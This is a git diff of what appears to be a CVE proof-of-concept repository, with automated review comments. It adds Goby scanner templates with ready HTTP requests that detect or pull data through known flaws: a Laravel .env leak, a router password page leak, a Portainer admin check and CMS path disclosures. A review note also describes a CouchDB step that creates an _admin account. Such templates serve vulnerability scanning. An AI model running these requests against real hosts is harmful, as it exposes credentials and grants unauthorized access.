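Review bot: The ScanSteps `ResponseTest` checks the body for `org.couchdb.user:{{{r1}}}`, but the request only defines `str1` and `str2` (`"str1|rand|str|32"`), so `r1` is never set and the check does not compare against the user name that was actually sent; it should reference `{{{str1}}}`. More important for operators: the scan step creates a real `_users` document with `"roles": ["_admin"]` on every host it probes and nothing removes it afterwards, so a detection run leaves a privileged account behind; `"Impact"` (currently `""`) should state this, and `"Recommendation"` (also empty) should tell the owner to upgrade past 1.7.0 / 2.1.1 and to review `_users` for unexpected accounts after any scan. The ExploitSteps hardcode `CanIHelpYou`/`NoThank` instead of reading the declared ExpParams value, so the parameter is dead configuration. `"Tags": ["Ultra vires"]` is a word-for-word translation; the other templates use short labels (`RCE`, `SSRF`, `lfi`), so `Privilege escalation` or `Unauthorized access` would be consistent, and ExpParams uses capitalised `Name`/`Type`/`Value` keys where the Go templates use lowercase.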
diff --git a/2017/CVE-2017-12635/poc/xray/CVE-2017-12635.yaml b/2017/CVE-2017-12635/poc/xray/CVE-2017-12635.yml
similarity index 100%
rename from 2017/CVE-2017-12635/poc/xray/CVE-2017-12635.yaml
rename to 2017/CVE-2017-12635/poc/xray/CVE-2017-12635.yml
diff --git a/2017/CVE-2017-16877/poc/xray/CVE-2017-16877.yaml b/2017/CVE-2017-16877/poc/xray/CVE-2017-16877.yml
similarity index 100%
rename from 2017/CVE-2017-16877/poc/xray/CVE-2017-16877.yaml
rename to 2017/CVE-2017-16877/poc/xray/CVE-2017-16877.yml
diff --git "a/2017/CVE-2017-16894/poc/goby/Laravel .env \351\205\215\347\275\256\346\226\207\344\273\266\346\263\204\351\234\262 CVE-2017-16894.json" "b/2017/CVE-2017-16894/poc/goby/Laravel .env \351\205\215\347\275\256\346\226\207\344\273\266\346\263\204\351\234\262 CVE-2017-16894.json"
new file mode 100644
index 000000000..8cf5d4445
--- /dev/null
+++ "b/2017/CVE-2017-16894/poc/goby/Laravel .env \351\205\215\347\275\256\346\226\207\344\273\266\346\263\204\351\234\262 CVE-2017-16894.json"
@@ -0,0 +1,78 @@
+{
+ "Name": "Laravel .env 配置文件泄露 CVE-2017-16894",
+ "Level": "1",
+ "Tags": [
+ "信息泄露"
+ ],
+ "GobyQuery": "app=\"Laravel-Framework\"",
+ "Description": "Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息",
+ "Product": "Laravel framework <= 5.5.21",
+ "Homepage": "https://github.com/laravel/framework/tree/5.5",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐏
",
+ "Recommandation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": ".env",
+ "type": "select",
+ "value": ".env",
+ "show": ""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/.env",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "APP_NAME",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/.env",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-01-24 12:19:09",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
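Review bot: `"Impact": "咩咩咩🐏"` is a placeholder and `"Recommandation": ""` is empty, so a hit from this template tells the owner neither what was exposed nor what to do. The Description already says `.env` is downloadable on Laravel framework 5.5.21 and earlier, so Impact can state that the application's environment file — which in Laravel normally holds `APP_KEY`, database credentials and third-party API secrets — is readable without authentication, and Recommandation can say to upgrade past 5.5.21, deny direct web access to `.env`, and rotate every secret the file contained. The Impact string also holds a raw line break before its closing quote, which strict JSON parsers reject. The `.env` entry in ExpParams is never referenced by ExploitSteps (the `uri` is hardcoded), so it is dead configuration; the Weblogic SSRF template in this commit has the same placeholder problem.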
diff --git a/2010/CVE-2010-2861/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2010/CVE-2010-2861/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/nuclei/wait_to_be_added
diff --git a/2014/CVE-2014-3120/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2014/CVE-2014-3120/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/oneliner/wait_to_be_added
diff --git a/2014/CVE-2014-4210/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/others/wait_to_be_added
similarity index 100%
rename from 2014/CVE-2014-4210/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/others/wait_to_be_added
diff --git a/2015/CVE-2015-1427/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/pocsuite2/wait_to_be_added
similarity index 100%
rename from 2015/CVE-2015-1427/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/pocsuite2/wait_to_be_added
diff --git a/2017/CVE-2017-12635/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/pocsuite3/wait_to_be_added
similarity index 100%
rename from 2017/CVE-2017-12635/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/pocsuite3/wait_to_be_added
diff --git a/2018/CVE-2018-6910/poc/goby/wait_to_be_added b/2017/CVE-2017-16894/poc/xray/wait_to_be_added
similarity index 100%
rename from 2018/CVE-2018-6910/poc/goby/wait_to_be_added
rename to 2017/CVE-2017-16894/poc/xray/wait_to_be_added
diff --git a/2017/CVE-2017-5521/poc/xray/CVE-2017-5521.yaml b/2017/CVE-2017-5521/poc/xray/CVE-2017-5521.yml
similarity index 100%
rename from 2017/CVE-2017-5521/poc/xray/CVE-2017-5521.yaml
rename to 2017/CVE-2017-5521/poc/xray/CVE-2017-5521.yml
diff --git a/2017/CVE-2017-7921/poc/xray/CVE-2017-7921.yaml b/2017/CVE-2017-7921/poc/xray/CVE-2017-7921.yml
similarity index 100%
rename from 2017/CVE-2017-7921/poc/xray/CVE-2017-7921.yaml
rename to 2017/CVE-2017-7921/poc/xray/CVE-2017-7921.yml
diff --git a/2017/CVE-2017-8917/poc/xray/CVE-2017-8917.yaml b/2017/CVE-2017-8917/poc/xray/CVE-2017-8917.yml
similarity index 100%
rename from 2017/CVE-2017-8917/poc/xray/CVE-2017-8917.yaml
rename to 2017/CVE-2017-8917/poc/xray/CVE-2017-8917.yml
diff --git a/2017/CVE-2017-9841/poc/xray/CVE-2017-9841.yaml b/2017/CVE-2017-9841/poc/xray/CVE-2017-9841.yml
similarity index 100%
rename from 2017/CVE-2017-9841/poc/xray/CVE-2017-9841.yaml
rename to 2017/CVE-2017-9841/poc/xray/CVE-2017-9841.yml
diff --git a/2018/CVE-2018-1000533/poc/xray/CVE-2018-1000533.yaml b/2018/CVE-2018-1000533/poc/xray/CVE-2018-1000533.yml
similarity index 100%
rename from 2018/CVE-2018-1000533/poc/xray/CVE-2018-1000533.yaml
rename to 2018/CVE-2018-1000533/poc/xray/CVE-2018-1000533.yml
diff --git a/2018/CVE-2018-1000600/poc/xray/CVE-2018-1000600.yaml b/2018/CVE-2018-1000600/poc/xray/CVE-2018-1000600.yml
similarity index 100%
rename from 2018/CVE-2018-1000600/poc/xray/CVE-2018-1000600.yaml
rename to 2018/CVE-2018-1000600/poc/xray/CVE-2018-1000600.yml
diff --git a/2018/CVE-2018-1000861/poc/xray/CVE-2018-1000861.yaml b/2018/CVE-2018-1000861/poc/xray/CVE-2018-1000861.yml
similarity index 100%
rename from 2018/CVE-2018-1000861/poc/xray/CVE-2018-1000861.yaml
rename to 2018/CVE-2018-1000861/poc/xray/CVE-2018-1000861.yml
diff --git a/2018/CVE-2018-10735/poc/xray/CVE-2018-10735.yaml b/2018/CVE-2018-10735/poc/xray/CVE-2018-10735.yml
similarity index 100%
rename from 2018/CVE-2018-10735/poc/xray/CVE-2018-10735.yaml
rename to 2018/CVE-2018-10735/poc/xray/CVE-2018-10735.yml
diff --git a/2018/CVE-2018-10736/poc/xray/CVE-2018-10736.yaml b/2018/CVE-2018-10736/poc/xray/CVE-2018-10736.yml
similarity index 100%
rename from 2018/CVE-2018-10736/poc/xray/CVE-2018-10736.yaml
rename to 2018/CVE-2018-10736/poc/xray/CVE-2018-10736.yml
diff --git a/2018/CVE-2018-10737/poc/xray/CVE-2018-10737.yaml b/2018/CVE-2018-10737/poc/xray/CVE-2018-10737.yml
similarity index 100%
rename from 2018/CVE-2018-10737/poc/xray/CVE-2018-10737.yaml
rename to 2018/CVE-2018-10737/poc/xray/CVE-2018-10737.yml
diff --git a/2018/CVE-2018-10738/poc/xray/CVE-2018-10738.yaml b/2018/CVE-2018-10738/poc/xray/CVE-2018-10738.yml
similarity index 100%
rename from 2018/CVE-2018-10738/poc/xray/CVE-2018-10738.yaml
rename to 2018/CVE-2018-10738/poc/xray/CVE-2018-10738.yml
diff --git a/2018/CVE-2018-11686/poc/xray/CVE-2018-11686.yaml b/2018/CVE-2018-11686/poc/xray/CVE-2018-11686.yml
similarity index 100%
rename from 2018/CVE-2018-11686/poc/xray/CVE-2018-11686.yaml
rename to 2018/CVE-2018-11686/poc/xray/CVE-2018-11686.yml
diff --git a/2018/CVE-2018-11759/poc/xray/CVE-2018-11759.yaml b/2018/CVE-2018-11759/poc/xray/CVE-2018-11759.yml
similarity index 100%
rename from 2018/CVE-2018-11759/poc/xray/CVE-2018-11759.yaml
rename to 2018/CVE-2018-11759/poc/xray/CVE-2018-11759.yml
diff --git a/2018/CVE-2018-12613/poc/xray/CVE-2018-12613.yaml b/2018/CVE-2018-12613/poc/xray/CVE-2018-12613.yml
similarity index 100%
rename from 2018/CVE-2018-12613/poc/xray/CVE-2018-12613.yaml
rename to 2018/CVE-2018-12613/poc/xray/CVE-2018-12613.yml
diff --git a/2018/CVE-2018-13379/poc/xray/CVE-2018-13379.yaml b/2018/CVE-2018-13379/poc/xray/CVE-2018-13379.yml
similarity index 100%
rename from 2018/CVE-2018-13379/poc/xray/CVE-2018-13379.yaml
rename to 2018/CVE-2018-13379/poc/xray/CVE-2018-13379.yml
diff --git a/2018/CVE-2018-17246/poc/xray/CVE-2018-17246.yaml b/2018/CVE-2018-17246/poc/xray/CVE-2018-17246.yml
similarity index 100%
rename from 2018/CVE-2018-17246/poc/xray/CVE-2018-17246.yaml
rename to 2018/CVE-2018-17246/poc/xray/CVE-2018-17246.yml
diff --git a/2018/CVE-2018-19127/poc/xray/CVE-2018-19127.yaml b/2018/CVE-2018-19127/poc/xray/CVE-2018-19127.yml
similarity index 100%
rename from 2018/CVE-2018-19127/poc/xray/CVE-2018-19127.yaml
rename to 2018/CVE-2018-19127/poc/xray/CVE-2018-19127.yml
diff --git a/2018/CVE-2018-19367/poc/goby/CVE_2018_19367_.json b/2018/CVE-2018-19367/poc/goby/CVE_2018_19367_.json
new file mode 100644
index 000000000..bdaebfaf4
--- /dev/null
+++ b/2018/CVE-2018-19367/poc/goby/CVE_2018_19367_.json
@@ -0,0 +1,44 @@
+{
+ "Name": "Portainer为创建用户导致未授权访问(CVE-2018-19367)",
+ "Level": "2",
+ "Tags": [],
+ "GobyQuery": "title=Portainer",
+ "Description": "Portainer是一款用于管理Docker环境和Docker主机的轻量级用户管理界面。 Portainer 1.19.2及之前版本中存在安全漏洞,该漏洞源于在管理员未被创建时,用于验证的API端点会返回404,而管理员已被创建时,则会返回204。攻击者可利用该漏洞在主机上获取未授权的访问权限。",
+ "Product": "Portainer",
+ "Homepage": "https://portainer.io/",
+ "Author": "k3vi_07@icloud.com",
+ "Impact": "Portainer是一款用于管理Docker环境和Docker主机的轻量级用户管理界面。 Portainer 1.19.2及之前版本中存在安全漏洞,该漏洞源于在管理员未被创建时,用于验证的API端点会返回404,而管理员已被创建时,则会返回204。攻击者可利用该漏洞在主机上获取未授权的访问权限。
",
+ "Recommandation": "undefined
",
+ "References": [
+ "https://github.com/lichti/shodan-portainer/"
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/api/users/admin/check",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "404",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "PostTime": "2021-03-20 12:49:52",
+ "GobyVersion": "1.8.255"
+}
\ No newline at end of file
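Review bot: The `Impact` and `Recommandation` values in this file contain raw line breaks before their closing quotes, which is not valid JSON — a strict parser rejects the file and only the Goby loader's own leniency, if it has any, would accept it; the same pattern, together with the misspelled key `"Recommandation"` and the literal placeholder `undefined`, recurs in the CVE-2019-16313, CVE-2020-11991, CVE-2020-13937 and CVE-2020-14181 templates in this commit, while the other templates here spell the key `"Recommendation"`. Both fields should be flattened to one line and the key corrected, e.g. `"Recommendation": ""` rather than `"Recommandation": "undefined\n"`, so tooling that reads remediation text finds the field at all. `Impact` is a verbatim copy of `Description`; a one-line statement of the consequence the description already gives (unauthorized access while no administrator has been initialised) would be more useful. The `Name` also reads 为创建 where 未创建 ("not yet created") appears to be intended.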
diff --git a/2018/CVE-2018-7662/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2018/CVE-2018-7662/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/nuclei/wait_to_be_added
diff --git a/2019/CVE-2019-16313/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2019/CVE-2019-16313/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/oneliner/wait_to_be_added
diff --git a/2019/CVE-2019-16920/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/others/wait_to_be_added
similarity index 100%
rename from 2019/CVE-2019-16920/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/others/wait_to_be_added
diff --git a/2019/CVE-2019-17506/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/pocsuite2/wait_to_be_added
similarity index 100%
rename from 2019/CVE-2019-17506/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/pocsuite2/wait_to_be_added
diff --git a/2020/CVE-2020-11991/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/pocsuite3/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-11991/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/pocsuite3/wait_to_be_added
diff --git a/2020/CVE-2020-13937/poc/goby/wait_to_be_added b/2018/CVE-2018-19367/poc/xray/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-13937/poc/goby/wait_to_be_added
rename to 2018/CVE-2018-19367/poc/xray/wait_to_be_added
diff --git a/2018/CVE-2018-3760/poc/xray/CVE-2018-3760.yaml b/2018/CVE-2018-3760/poc/xray/CVE-2018-3760.yml
similarity index 100%
rename from 2018/CVE-2018-3760/poc/xray/CVE-2018-3760.yaml
rename to 2018/CVE-2018-3760/poc/xray/CVE-2018-3760.yml
diff --git a/2018/CVE-2018-6605/poc/xray/CVE-2018-6605.yaml b/2018/CVE-2018-6605/poc/xray/CVE-2018-6605.yml
similarity index 100%
rename from 2018/CVE-2018-6605/poc/xray/CVE-2018-6605.yaml
rename to 2018/CVE-2018-6605/poc/xray/CVE-2018-6605.yml
diff --git a/2018/CVE-2018-6910/poc/goby/CVE-2018-6910.json b/2018/CVE-2018-6910/poc/goby/CVE-2018-6910.json
new file mode 100644
index 000000000..e53d65f5d
--- /dev/null
+++ b/2018/CVE-2018-6910/poc/goby/CVE-2018-6910.json
@@ -0,0 +1,74 @@
+{
+ "Name": "DedeCMS InfoLeak CVE-2018-6910",
+ "Level": "1",
+ "Tags": [
+ "infoleak"
+ ],
+ "GobyQuery": "app=\"DedeCMS\"",
+ "Description": "远程攻击者可通过对include/downmix.inc.php或inc/inc_archives_functions.php文件发送直接请求利用该漏洞获取完整路径。",
+ "Product": "DedeCMS",
+ "Homepage": "http://www.dedecms.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/include/downmix.inc.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Fatal error",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "downmix.inc.php",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Call to undefined function helper()",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-14 16:43:48",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
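Review bot: `Impact`, `Recommendation` and `References` are all empty, so a consumer of this template learns the request to send but nothing about consequence or remediation; `"Impact": "Discloses the installation's absolute filesystem path"` and a `Recommendation` along the lines of not returning PHP error output to clients and restricting direct requests to files under `include/` would fill the gap, and `References` should at least carry the CVE record. The `Description` names two files but `ScanSteps` requests only `/include/downmix.inc.php`; either the description should say that only the first is probed or the omission should be noted so readers do not assume both are covered. `"follow_redirect": true` combined with `$code == 200` means a redirect to a generic page still passes the status check, leaving the body substrings as the only real evidence — acceptable here because three of them are required, but worth a comment in `bz`.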
diff --git a/2018/CVE-2018-6910/poc/xray/CVE-2018-6910.yaml b/2018/CVE-2018-6910/poc/xray/CVE-2018-6910.yml
similarity index 100%
rename from 2018/CVE-2018-6910/poc/xray/CVE-2018-6910.yaml
rename to 2018/CVE-2018-6910/poc/xray/CVE-2018-6910.yml
diff --git a/2018/CVE-2018-7314/poc/xray/CVE-2018-7314.yaml b/2018/CVE-2018-7314/poc/xray/CVE-2018-7314.yml
similarity index 100%
rename from 2018/CVE-2018-7314/poc/xray/CVE-2018-7314.yaml
rename to 2018/CVE-2018-7314/poc/xray/CVE-2018-7314.yml
diff --git a/2018/CVE-2018-7490/poc/xray/CVE-2018-7490.yaml b/2018/CVE-2018-7490/poc/xray/CVE-2018-7490.yml
similarity index 100%
rename from 2018/CVE-2018-7490/poc/xray/CVE-2018-7490.yaml
rename to 2018/CVE-2018-7490/poc/xray/CVE-2018-7490.yml
diff --git a/2018/CVE-2018-7600/poc/xray/CVE-2018-7600.yaml b/2018/CVE-2018-7600/poc/xray/CVE-2018-7600.yml
similarity index 100%
rename from 2018/CVE-2018-7600/poc/xray/CVE-2018-7600.yaml
rename to 2018/CVE-2018-7600/poc/xray/CVE-2018-7600.yml
diff --git a/2018/CVE-2018-7662/poc/goby/CVE-2018-7662.json b/2018/CVE-2018-7662/poc/goby/CVE-2018-7662.json
new file mode 100644
index 000000000..b397c84c3
--- /dev/null
+++ b/2018/CVE-2018-7662/poc/goby/CVE-2018-7662.json
@@ -0,0 +1,108 @@
+{
+ "Name": "Couch CMS Infoleak CVE-2018-7662",
+ "Level": "3",
+ "Tags": [
+ "infoleak"
+ ],
+ "GobyQuery": "(title=\"CouchCMS\" | body=\"Powered by CouchCMS\")",
+ "Description": "Couch through 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php",
+ "Product": "Couch cms",
+ "Homepage": "https://www.couchcms.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/includes/mysql2i/mysql2i.func.php",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "mysql2i.func.php on line 10",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Fatal error: Cannot redeclare mysql_affected_rows() in",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/addons/phpmailer/phpmailer.php",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "phpmailer.php on line 10",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Fatal error: Call to a menber function add_event_listener() on a non-object in",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-09 19:56:42",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
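Review bot: The second step's body indicator `"Fatal error: Call to a menber function add_event_listener() on a non-object in"` misspells "member", so it can never match the text PHP actually emits; because the top-level operation is `AND`, the whole template can never report a finding. It should read `"value": "Fatal error: Call to a member function add_event_listener() on a non-object in"`. The `on line 10` substrings are also brittle — they tie detection to the exact source line of one release, and a later line shift silently turns the template into a false negative — so a `bz` note stating which version they were taken from would help. `Impact` and `Recommendation` are empty, as in the DedeCMS template in this commit.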
diff --git a/2018/CVE-2018-7662/poc/xray/CVE-2018-7662.yaml b/2018/CVE-2018-7662/poc/xray/CVE-2018-7662.yml
similarity index 100%
rename from 2018/CVE-2018-7662/poc/xray/CVE-2018-7662.yaml
rename to 2018/CVE-2018-7662/poc/xray/CVE-2018-7662.yml
diff --git a/2018/CVE-2018-7700/poc/xray/CVE-2018-7700.yaml b/2018/CVE-2018-7700/poc/xray/CVE-2018-7700.yml
similarity index 100%
rename from 2018/CVE-2018-7700/poc/xray/CVE-2018-7700.yaml
rename to 2018/CVE-2018-7700/poc/xray/CVE-2018-7700.yml
diff --git a/2018/CVE-2018-8033/poc/xray/CVE-2018-8033.yaml b/2018/CVE-2018-8033/poc/xray/CVE-2018-8033.yml
similarity index 100%
rename from 2018/CVE-2018-8033/poc/xray/CVE-2018-8033.yaml
rename to 2018/CVE-2018-8033/poc/xray/CVE-2018-8033.yml
diff --git a/2018/CVE-2018-8770/poc/xray/CVE-2018-8770.yaml b/2018/CVE-2018-8770/poc/xray/CVE-2018-8770.yml
similarity index 100%
rename from 2018/CVE-2018-8770/poc/xray/CVE-2018-8770.yaml
rename to 2018/CVE-2018-8770/poc/xray/CVE-2018-8770.yml
diff --git a/2018/CVE-2018-9995/poc/xray/CVE-2018-9995.yaml b/2018/CVE-2018-9995/poc/xray/CVE-2018-9995.yml
similarity index 100%
rename from 2018/CVE-2018-9995/poc/xray/CVE-2018-9995.yaml
rename to 2018/CVE-2018-9995/poc/xray/CVE-2018-9995.yml
diff --git a/2019/CVE-2019-0193/poc/xray/CVE-2019-0193.yaml b/2019/CVE-2019-0193/poc/xray/CVE-2019-0193.yml
similarity index 100%
rename from 2019/CVE-2019-0193/poc/xray/CVE-2019-0193.yaml
rename to 2019/CVE-2019-0193/poc/xray/CVE-2019-0193.yml
diff --git a/2019/CVE-2019-10758/poc/xray/CVE-2019-10758.yaml b/2019/CVE-2019-10758/poc/xray/CVE-2019-10758.yml
similarity index 100%
rename from 2019/CVE-2019-10758/poc/xray/CVE-2019-10758.yaml
rename to 2019/CVE-2019-10758/poc/xray/CVE-2019-10758.yml
diff --git a/2019/CVE-2019-11510/poc/xray/CVE-2019-11510.yaml b/2019/CVE-2019-11510/poc/xray/CVE-2019-11510.yml
similarity index 100%
rename from 2019/CVE-2019-11510/poc/xray/CVE-2019-11510.yaml
rename to 2019/CVE-2019-11510/poc/xray/CVE-2019-11510.yml
diff --git a/2019/CVE-2019-11581/poc/xray/CVE-2019-11581.yaml b/2019/CVE-2019-11581/poc/xray/CVE-2019-11581.yml
similarity index 100%
rename from 2019/CVE-2019-11581/poc/xray/CVE-2019-11581.yaml
rename to 2019/CVE-2019-11581/poc/xray/CVE-2019-11581.yml
diff --git a/2019/CVE-2019-12725/poc/xray/CVE-2019-12725.yaml b/2019/CVE-2019-12725/poc/xray/CVE-2019-12725.yml
similarity index 100%
rename from 2019/CVE-2019-12725/poc/xray/CVE-2019-12725.yaml
rename to 2019/CVE-2019-12725/poc/xray/CVE-2019-12725.yml
diff --git a/2019/CVE-2019-15107/poc/xray/CVE-2019-15107.yaml b/2019/CVE-2019-15107/poc/xray/CVE-2019-15107.yml
similarity index 100%
rename from 2019/CVE-2019-15107/poc/xray/CVE-2019-15107.yaml
rename to 2019/CVE-2019-15107/poc/xray/CVE-2019-15107.yml
diff --git a/2019/CVE-2019-16097/poc/xray/CVE-2019-16097.yaml b/2019/CVE-2019-16097/poc/xray/CVE-2019-16097.yml
similarity index 100%
rename from 2019/CVE-2019-16097/poc/xray/CVE-2019-16097.yaml
rename to 2019/CVE-2019-16097/poc/xray/CVE-2019-16097.yml
diff --git a/2019/CVE-2019-16278/poc/xray/CVE-2019-16278.yaml b/2019/CVE-2019-16278/poc/xray/CVE-2019-16278.yml
similarity index 100%
rename from 2019/CVE-2019-16278/poc/xray/CVE-2019-16278.yaml
rename to 2019/CVE-2019-16278/poc/xray/CVE-2019-16278.yml
diff --git "a/2019/CVE-2019-16313/poc/goby/\350\234\202\347\275\221\344\272\222\350\201\224 \344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31 \345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2019-16313.json" "b/2019/CVE-2019-16313/poc/goby/\350\234\202\347\275\221\344\272\222\350\201\224 \344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31 \345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2019-16313.json"
new file mode 100644
index 000000000..f2f4667a3
--- /dev/null
+++ "b/2019/CVE-2019-16313/poc/goby/\350\234\202\347\275\221\344\272\222\350\201\224 \344\274\201\344\270\232\347\272\247\350\267\257\347\224\261\345\231\250v4.31 \345\257\206\347\240\201\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2019-16313.json"
@@ -0,0 +1,70 @@
+{
+ "Name": "蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313",
+ "Level": "2",
+ "Tags": [
+ "账号密码泄露"
+ ],
+ "GobyQuery": "(title=\"登录界面\" && app=\"ifw8-Router\")",
+ "Description": "蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器",
+ "Product": "蜂网互联企业级路由器v4.31",
+ "Homepage": "http://www.ifw8.cn/",
+ "Author": "PeiQi",
+ "Impact": "🐏
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/action/usermanager.htm",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "pwd",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/action/usermanager.htm",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-02-21 11:22:17",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
